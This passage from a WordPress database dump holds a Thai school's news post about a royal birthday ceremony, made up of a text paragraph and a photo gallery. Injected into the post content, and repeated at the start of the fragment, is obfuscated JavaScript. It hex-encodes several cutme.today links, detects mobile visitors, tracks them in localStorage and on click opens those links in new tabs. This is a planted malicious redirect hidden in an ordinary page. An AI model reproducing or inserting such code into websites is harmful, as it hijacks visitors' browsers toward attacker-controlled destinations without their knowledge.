_0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว','','inherit','closed','closed','','245-revision-v1','','','2024-07-28 23:06:27','2024-07-28 16:06:27','',245,'http://pakhaeng.ssk.in.th/?p=268',0,'revision','',0),
(269,1,'2024-07-28 23:07:59','2024-07-28 16:07:59','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 28 กรกฎาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เข้าร่วมกิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสพระราชพิธีมหามงคลเฉลิมพระชนมพรรษา 6 รอบ 28 กรกฎาคม 2567 ณ หอประชุมที่ว่าการอำเภอโนนคูณ อำเภอโนนคูณ จังหวัดศรีสะเกษ โดยได้ร่วมทำพิธีเจริญพระพุทธมนต์ ทำบุญตักบาตรถวายเป็นพระราชกุศล พิธีถวายสัตย์ปฏิญาณเพื่อเป็นข้าราชการที่ดีและพลังของแผ่นดินและพิธีลงนามถวายพระพร และพิธีถวายราชสักการะและจุดเทียนถวายพระพรชัยมงคล กิจกรรมในครั้งนี้ เพื่อน้อมรำลึกในพระมหากรุณาธิคุณ และแสดงความจงรักภักดีต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ อีกทั้งเพื่อเสริมสร้างความรักความสามัคคีแก่ปวงชนชาวไทยที่มีสถาบันพระมหากษัตริย์เป็นศูนย์รวมใจอีกด้วย</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":248,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154842.jpg\" alt=\"\" class=\"wp-image-248\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":249,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154845-1024x682.jpg\" alt=\"\" class=\"wp-image-249\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":251,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154847-1024x682.jpg\" alt=\"\" class=\"wp-image-251\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154849-1024x682.jpg\" alt=\"\" class=\"wp-image-246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":247,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154850-1024x682.jpg\" alt=\"\" class=\"wp-image-247\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":250,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154855-713x1024.jpg\" alt=\"\" class=\"wp-image-250\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":253,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578485-1024x578.jpg\" alt=\"\" class=\"wp-image-253\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":252,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578490-578x1024.jpg\" alt=\"\" class=\"wp-image-252\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":254,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794195-1024x768.jpg\" alt=\"\" class=\"wp-image-254\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":255,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794198-1024x768.jpg\" alt=\"\" class=\"wp-image-255\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":256,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794204-1024x768.jpg\" alt=\"\" class=\"wp-image-256\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":257,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794210-1024x768.jpg\" alt=\"\" class=\"wp-image-257\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":258,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__29622275-1024x768.jpg\" alt=\"\" class=\"wp-image-258\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":259,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__32849967-1024x785.jpg\" alt=\"\" class=\"wp-image-259\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":261,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788230_0-1024x576.jpg\" alt=\"\" class=\"wp-image-261\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788232_0-1024x768.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":262,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788233_0-1024x576.jpg\" alt=\"\" class=\"wp-image-262\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":263,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788234_0-1024x576.jpg\" alt=\"\" class=\"wp-image-263\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":264,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788235_0-1024x576.jpg\" alt=\"\" class=\"wp-image-264\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":265,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788236_0-1024x576.jpg\" alt=\"\" class=\"wp-image-265\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":266,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788237_0-1024x576.jpg\" alt=\"\" class=\"wp-image-266\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 